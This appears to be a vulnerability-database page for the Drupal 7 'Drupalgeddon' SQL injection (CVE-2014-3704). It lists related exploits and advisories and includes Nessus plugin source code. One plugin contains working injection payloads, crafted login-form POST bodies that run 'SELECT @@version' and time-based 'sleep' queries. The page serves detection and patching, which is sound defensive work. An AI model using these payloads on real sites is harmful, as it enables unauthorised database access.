Vulnerabilities > CVE-2014-3704 - SQL Injection vulnerability in multiple products
Attack vector
UNKNOWN Attack complexity
UNKNOWN Privileges required
UNKNOWN Confidentiality impact
UNKNOWN Integrity impact
UNKNOWN Availability impact
UNKNOWN Summary
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
Vulnerable Configurations
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Command Line Execution through SQL Injection An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host.
- Object Relational Mapping Injection An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible.
- SQL Injection through SOAP Parameter Tampering An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message.
- Expanding Control over the Operating System from the Database An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.
- SQL Injection This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers' choice. SQL Injection enables an attacker to talk directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database. In order to successfully inject SQL and retrieve information from a database, an attacker:
D2sec
name | Drupal core 7.x SQL Injection |
url | http://www.d2sec.com/exploits/drupal_core_7.x_sql_injection.html |
Exploit-Db
description Drupal < 7.32 Pre Auth SQL Injection. CVE-2014-3704. Webapps exploit for php platform file exploits/php/webapps/35150.php id EDB-ID:35150 last seen 2016-02-04 modified 2014-11-03 platform php port 443 published 2014-11-03 reporter Stefan Horst source https://www.exploit-db.com/download/35150/ title Drupal < 7.32 Pre Auth SQL Injection type webapps description Drupal Core <= 7.32 - SQL Injection (1). Webapps exploit for php platform file exploits/php/webapps/34984.py id EDB-ID:34984 last seen 2016-02-04 modified 2014-10-16 platform php port published 2014-10-16 reporter fyukyuk source https://www.exploit-db.com/download/34984/ title Drupal Core <= 7.32 - SQL Injection 1 type webapps description Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session). CVE-2014-3704. Webapps exploit for PHP platform id EDB-ID:44355 last seen 2018-05-24 modified 2014-11-03 published 2014-11-03 reporter Exploit-DB source https://www.exploit-db.com/download/44355/ title Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) description Drupal Core <= 7.32 - SQL Injection (2). CVE-2014-3704,CVE-CVE-2014-3704. Webapps exploit for php platform file exploits/php/webapps/34992.py id EDB-ID:34992 last seen 2016-02-04 modified 2014-10-17 platform php port published 2014-10-17 reporter Claudio Viviani source https://www.exploit-db.com/download/34992/ title Drupal Core <= 7.32 - SQL Injection 2 type webapps description Drupal Core <= 7.32 - SQL Injection (PHP). CVE-2014-3704,CVE-CVE-2014-3704. Webapps exploit for php platform file exploits/php/webapps/34993.php id EDB-ID:34993 last seen 2016-02-04 modified 2014-10-17 platform php port published 2014-10-17 reporter Dustin Dörr source https://www.exploit-db.com/download/34993/ title Drupal Core <= 7.32 - SQL Injection PHP type webapps
Metasploit
description | This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). Two methods are available to trigger the PHP payload on the target: \- set TARGET 0: Form-cache PHP injection method (default). This uses the SQLi to upload a malicious form to Drupal's cache, then trigger the cache entry to execute the payload using a POP chain. \- set TARGET 1: User-post injection method. This creates a new Drupal user, adds it to the administrators group, enable Drupal's PHP module, grant the administrators the right to bundle PHP code in their post, create a new post containing the payload and preview it to trigger the payload execution. |
id | MSF:EXPLOIT/MULTI/HTTP/DRUPAL_DRUPAGEDDON |
last seen | 2020-05-28 |
modified | 2019-12-11 |
published | 2014-10-16 |
references |
|
reporter | Rapid7 |
source | https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/drupal_drupageddon.rb |
title | Drupal HTTP Parameter Key/Value SQL Injection |
Nessus
NASL family Fedora Local Security Checks NASL id FEDORA_2014-13030.NASL description Update to upstream 7.32 security release for SA-CORE-2014-005, CVE-2014-3407 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-17 modified 2014-10-29 plugin id 78707 published 2014-10-29 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78707 title Fedora 20 : drupal7-7.32-1.fc20 (2014-13030) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2014-13030. # include("compat.inc"); if (description) { script_id(78707); script_version("1.11"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/03/12"); script_cve_id("CVE-2014-3704"); script_bugtraq_id(70595); script_xref(name:"FEDORA", value:"2014-13030"); script_name(english:"Fedora 20 : drupal7-7.32-1.fc20 (2014-13030)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Update to upstream 7.32 security release for SA-CORE-2014-005, CVE-2014-3407 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1153402" ); # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/141512.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?222d2be4" ); script_set_attribute( attribute:"solution", value:"Update the affected drupal7 package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Drupal core 7.x SQL Injection"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Drupal HTTP Parameter Key/Value SQL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:drupal7"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:20"); script_set_attribute(attribute:"vuln_publication_date", value:"2014/10/15"); script_set_attribute(attribute:"patch_publication_date", value:"2014/10/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/10/29"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^20([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 20.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC20", reference:"drupal7-7.32-1.fc20")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "drupal7"); }
NASL family CGI abuses NASL id DRUPAL_7_CORE_SQLI.NASL description The remote web server is running a version of Drupal that is affected by a SQL injection vulnerability due to a flaw in the Drupal database abstraction API, which allows a remote attacker to use specially crafted requests that can result in arbitrary SQL execution. This may lead to privilege escalation, arbitrary PHP execution, or remote code execution. last seen 2020-06-01 modified 2020-06-02 plugin id 78515 published 2014-10-16 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78515 title Drupal Database Abstraction API SQLi code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(78515); script_version("1.19"); script_cvs_date("Date: 2019/11/25"); script_cve_id("CVE-2014-3704"); script_bugtraq_id(70595); script_xref(name:"EDB-ID", value:"34984"); script_xref(name:"EDB-ID", value:"34992"); script_xref(name:"EDB-ID", value:"34993"); script_xref(name:"EDB-ID", value:"35150"); script_name(english:"Drupal Database Abstraction API SQLi"); script_summary(english:"Attempts to execute a SQLi exploit against the Drupal instance."); script_set_attribute(attribute:"synopsis", value: "The remote web server is running a PHP application that is affected by a SQL injection vulnerability."); script_set_attribute(attribute:"description", value: "The remote web server is running a version of Drupal that is affected by a SQL injection vulnerability due to a flaw in the Drupal database abstraction API, which allows a remote attacker to use specially crafted requests that can result in arbitrary SQL execution. This may lead to privilege escalation, arbitrary PHP execution, or remote code execution."); script_set_attribute(attribute:"see_also", value:"https://www.drupal.org/SA-CORE-2014-005"); script_set_attribute(attribute:"see_also", value:"https://www.drupal.org/project/drupal/releases/7.32"); script_set_attribute(attribute:"solution", value: "Upgrade to version 7.32 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"d2_elliot_name", value:"Drupal core 7.x SQL Injection"); script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Drupal HTTP Parameter Key/Value SQL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2014/10/15"); script_set_attribute(attribute:"patch_publication_date", value:"2014/10/15"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/10/16"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:drupal:drupal"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("drupal_detect.nasl"); script_require_keys("www/PHP", "installed_sw/Drupal"); script_require_ports("Services/www", 80); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("install_func.inc"); app = "Drupal"; get_install_count(app_name:app, exit_if_zero:TRUE); port = get_http_port(default:80, php:TRUE); install = get_single_install( app_name : app, port : port ); dir = install['path']; url = build_url(qs:dir, port:port); vuln = FALSE; time_based = FALSE; headers = make_array("Content-Type","application/x-www-form-urlencoded"); postdata = "name[0;SELECT+@@version;#]=0;&name[0]=nessus&pass=nessus&test2=" + "test&form_build_id=&form_id=user_login_block&op=Log+in"; res = http_send_recv3( method : "POST", port : port, item : dir + "/?q=node&destination=node", data : postdata, add_headers : headers, exit_on_fail : TRUE ); if ( ">Warning</em>: mb_strlen() expects parameter" >< res[2] && "The website encountered an unexpected error." >!< res[2] ) { vuln = TRUE; attack_req = http_last_sent_request(); output = strstr(res[2], ">Warning</em>: mb_strlen()"); } # Check time based attack for instances where error messages have been # disabled by the administrator -> https://www.drupal.org/node/244642 if (!vuln && report_paranoia == 2) { stimes = make_list(4, 6, 9); for ( i = 0 ; i < max_index(stimes); i ++ ) { http_set_read_timeout(stimes[i] + 10); then = unixtime(); postdata = "name[0;SELECT+sleep(" + stimes[i] + ");#]=&name[0]=nessus" + "&pass=fake&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; res = http_send_recv3( method : "POST", port : port, item : dir + "/?q=node&destination=node", data : postdata, add_headers : headers, exit_on_fail : TRUE ); now = unixtime(); ttime = now - then; if ( (ttime >= stimes[i]) && (ttime <= (stimes[i] + 5)) ) { vuln = TRUE; time_based = TRUE; attack_req = http_last_sent_request(); output = 'The request produced a sleep time of ' + ttime + ' seconds.'; continue; } else vuln = FALSE; } } if (!vuln) audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url); if (time_based) { snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30); set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE); if (report_verbosity > 0) { report = '\nNessus was able to exploit the issue using the following request :' + '\n' + attack_req + '\n' + '\n' + output + '\n'; security_hole(port:port, extra:report); } else security_hole(port); exit(0); } else { security_report_v4( port : port, severity : SECURITY_HOLE, generic : TRUE, line_limit : 5, sqli : TRUE, # Sets SQLInjection KB key request : make_list(attack_req), output : chomp(output) ); exit(0); }
NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_6F825FA4556011E4A4C300A0986F28C4.NASL description Drupal Security Team reports : Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks. A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks. This vulnerability can be exploited by anonymous users. last seen 2020-06-01 modified 2020-06-02 plugin id 78521 published 2014-10-17 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78521 title FreeBSD : drupal7 -- SQL injection (6f825fa4-5560-11e4-a4c3-00a0986f28c4) NASL family Fedora Local Security Checks NASL id FEDORA_2014-12934.NASL description Update to upstream 7.32 security release for SA-CORE-2014-005, CVE-2014-3704 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-17 modified 2014-11-03 plugin id 78795 published 2014-11-03 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78795 title Fedora 21 : drupal7-7.32-1.fc21 (2014-12934) NASL family Fedora Local Security Checks NASL id FEDORA_2014-13053.NASL description Update to upstream 7.32 security release for SA-CORE-2014-005, CVE-2014-3704 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-03-17 modified 2014-10-29 plugin id 78710 published 2014-10-29 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78710 title Fedora 19 : drupal7-7.32-1.fc19 (2014-13053) NASL family Mandriva Local Security Checks NASL id MANDRIVA_MDVSA-2015-181.NASL description Updated drupal packages fix security vulnerabilities : An information disclosure vulnerability was discovered in Drupal before 7.27. When pages are cached for anonymous users, form state may leak between anonymous users. Sensitive or private information recorded for one anonymous user could thus be disclosed to other users interacting with the same form at the same time (CVE-2014-2983). Multiple security issues in Drupal before 7.29, including a denial of service issue, an access bypass issue in the File module, and multiple cross-site scripting issues (CVE-2014-5019, CVE-2014-5020, CVE-2014-5021, CVE-2014-5022). A denial of service issue exists in Drupal before 7.31, due to XML entity expansion in a publicly accessible XML-RPC endpoint. A SQL Injection issue exists in Drupal before 7.32 due to the way the Drupal core handles prepared statements. A malicious user can inject arbitrary SQL queries, and thereby completely control the Drupal site. This vulnerability can be exploited by remote attackers without any kind of authentication required (CVE-2014-3704). Aaron Averill discovered that a specially crafted request can give a user access to another user last seen 2020-06-01 modified 2020-06-02 plugin id 82456 published 2015-03-31 reporter This script is Copyright (C) 2015-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/82456 title Mandriva Linux Security Advisory : drupal (MDVSA-2015:181) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-3051.NASL description Stefan Horst discovered a vulnerability in the Drupal database abstraction API, which may result in SQL injection. last seen 2020-03-17 modified 2014-10-17 plugin id 78518 published 2014-10-17 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78518 title Debian DSA-3051-1 : drupal7 - security update NASL family CGI abuses NASL id DRUPAL_7_32.NASL description The remote web server is running a version of Drupal that is 7.x prior to 7.32. It is, therefore, potentially affected by a SQL injection vulnerability due to a flaw in the Drupal database abstraction API, which allows a remote attacker to use specially crafted requests that can result in arbitrary SQL execution. This may lead to privilege escalation, arbitrary PHP execution, or remote code execution. Note that Nessus has not tested for this issue but has instead relied only on the application last seen 2020-06-01 modified 2020-06-02 plugin id 78511 published 2014-10-16 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/78511 title Drupal 7.x < 7.32 SQLi
Packetstorm
data source https://packetstormsecurity.com/files/download/128720/drup4l_7_31_SqlInj_add_admin.py.txt id PACKETSTORM:128720 last seen 2016-12-05 published 2014-10-16 reporter Claudio Viviani source https://packetstormsecurity.com/files/128720/Drupal-7.X-SQL-Injection.html title Drupal 7.X SQL Injection data source https://packetstormsecurity.com/files/download/128741/drupal_drupageddon.rb.txt id PACKETSTORM:128741 last seen 2016-12-05 published 2014-10-18 reporter Brandon Perry source https://packetstormsecurity.com/files/128741/Drupal-HTTP-Parameter-Key-Value-SQL-Injection.html title Drupal HTTP Parameter Key/Value SQL Injection data source https://packetstormsecurity.com/files/download/128738/drupal732py-sql.txt id PACKETSTORM:128738 last seen 2016-12-05 published 2014-10-17 reporter fyukyuk source https://packetstormsecurity.com/files/128738/Drupal-Core-7.32-SQL-Injection.html title Drupal Core 7.32 SQL Injection data source https://packetstormsecurity.com/files/download/128744/drupal732-sql.txt id PACKETSTORM:128744 last seen 2016-12-05 published 2014-10-17 reporter Milan Kragujevic source https://packetstormsecurity.com/files/128744/Drupal-7.x-SQL-Injection.html title Drupal 7.x SQL Injection
Seebug
bulletinFamily exploit description No description provided by source. id SSV:87362 last seen 2017-11-19 modified 2014-11-13 published 2014-11-13 reporter Root source https://www.seebug.org/vuldb/ssvid-87362 title Drupal Core <= 7.32 - SQL Injection (PHP) bulletinFamily exploit description No description provided by source. id SSV:87363 last seen 2017-11-19 modified 2014-11-13 published 2014-11-13 reporter Root source https://www.seebug.org/vuldb/ssvid-87363 title Drupal Core <= 7.32 - SQL Injection (#2)
References
- http://osvdb.org/show/osvdb/113371
- http://osvdb.org/show/osvdb/113371
- http://packetstormsecurity.com/files/128720/Drupal-7.X-SQL-Injection.html
- http://packetstormsecurity.com/files/128720/Drupal-7.X-SQL-Injection.html
- http://packetstormsecurity.com/files/128721/Drupal-7.31-SQL-Injection.html
- http://packetstormsecurity.com/files/128721/Drupal-7.31-SQL-Injection.html
- http://packetstormsecurity.com/files/128741/Drupal-HTTP-Parameter-Key-Value-SQL-Injection.html
- http://packetstormsecurity.com/files/128741/Drupal-HTTP-Parameter-Key-Value-SQL-Injection.html
- http://seclists.org/fulldisclosure/2014/Oct/75
- http://seclists.org/fulldisclosure/2014/Oct/75
- http://secunia.com/advisories/59972
- http://secunia.com/advisories/59972
- http://www.debian.org/security/2014/dsa-3051
- http://www.debian.org/security/2014/dsa-3051
- http://www.exploit-db.com/exploits/34984
- http://www.exploit-db.com/exploits/34984
- http://www.exploit-db.com/exploits/34992
- http://www.exploit-db.com/exploits/34992
- http://www.exploit-db.com/exploits/34993
- http://www.exploit-db.com/exploits/34993
- http://www.exploit-db.com/exploits/35150
- http://www.exploit-db.com/exploits/35150
- http://www.openwall.com/lists/oss-security/2014/10/15/23
- http://www.openwall.com/lists/oss-security/2014/10/15/23
- http://www.securityfocus.com/archive/1/533706/100/0/threaded
- http://www.securityfocus.com/archive/1/533706/100/0/threaded
- http://www.securityfocus.com/bid/70595
- http://www.securityfocus.com/bid/70595
- https://www.drupal.org/SA-CORE-2014-005
- https://www.drupal.org/SA-CORE-2014-005
- https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
- https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
- https://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html
- https://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html